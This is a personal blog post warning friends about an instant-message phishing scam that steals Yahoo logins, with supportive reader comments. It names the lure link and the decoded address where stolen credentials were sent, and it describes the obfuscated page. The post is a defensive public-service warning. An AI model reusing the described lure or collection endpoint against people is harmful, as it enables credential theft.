?

Log in

No account? Create an account
Lorrie
lwood
..::.:

September 2012
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30

Lorrie [userpic]
SPIM, Phishing, and You!

So, there you are, on your IM client, and a friend sends you a link out of the blue, no hello or anything, just an innocuous link like this:

http:// www . geocities . com / input_on_new_pics_plz

Don't ever go to links that people send you out of the blue without some obvious tip-off: have you been talking already? Is it obviously going to a site in which you have a shared obscure interest?

No?

Then DON'T GO!

If you do, in this case, you get a nice looking page that asks for your Yahoo name and password, which will, if you have that gullible moment, then proceed to collect more usernames and passwords, and it will then have access to all your Yahoogroups--and Yahoo mail, if you use that, and so on.

If this happens to you, no software has been installed on your machine: this is all being done remotely. To lock the asshats back out change your Yahoo password and they will no longer have access. Count yourself lucky, as other spim-trojans do change passwords, as others have found to their peril.

This has been a Public Service Announcement; more details behind this cut.

Picking apart the code reveals several obfuscated URLs and some equally obfuscated Javascript, useful to defeat ad blockers and protect source code. A Geocities ad server in Taiwan is lame, but legitimate. The encrypted Javascript was more than I wanted to pick at, but obfuscated URL's are easy.

The page sends your Yahoo name and password to a lengthy obfuscated URL, which I threw to the demons, particularly http://www.netdemon.net/decode.html. Decoded, your name and password get sent to:

http://www2.fiberbit.net/form/mailto.cgi

Congratulations, it just got e-mailed to Person or Persons Unknown, and your credentials will now be used to collect more names and passwords, which which the aforementioned miscreants can im your friends, get their names and passwords, and e-mail any Yahoogroup to which you are subscribed--if you own a Yahoogroup or two, it gets worse. The only good thing you can say is that, well, at least it didn't change your Yahoo password for you.

This is a clever combination of social engineering (getting people to do what they're already inclined to) and phishing (using a faked legitimate-looking page to get real information)--clever because it's coming along an unexpected vector.

Unexpected...until you're bitten by one. I've known several who were (by this or another), two of whom have extensive experience in IT and therefore Should Have Known Better.

Don't let this happen to you!

-- Lorrie

Current Mood: calminformative
Comments

Thanks for posting this, I fell prey to this one awhile back.

Heh--well, someone else on my flist was bit just this morning by this exact one, and another friend was bit by a different one a few months ago...and as she couldn't verify her identity to the Yahoo wonks, she lost her Yahoo account of over a decade's good standing.

-- Lorrie

*whimpers* Yahoo! mail sent me email today trying to coax me back to their service. There was no way to reply and tell them they'd have to pay me...

--Ember--

Or that they couldn't pay you, whichever...

*hugs*

-- Lorrie

may i link to this in my LJ to further spread the word?

Go thou and do!

-- Lorrie

Fuck off--and I'm not off this evening. 8-P

You should tell whoever got bit that they've been bit, though--at least they can fix themselves by changing their yahoo password.

-- Lorrie

Just changed my password on GPs... the only links I seem to get via IM are from my spouse, sending me amusing webcomics.

Still, changing one's password every so often is a good security measure in any case...

-- Lorrie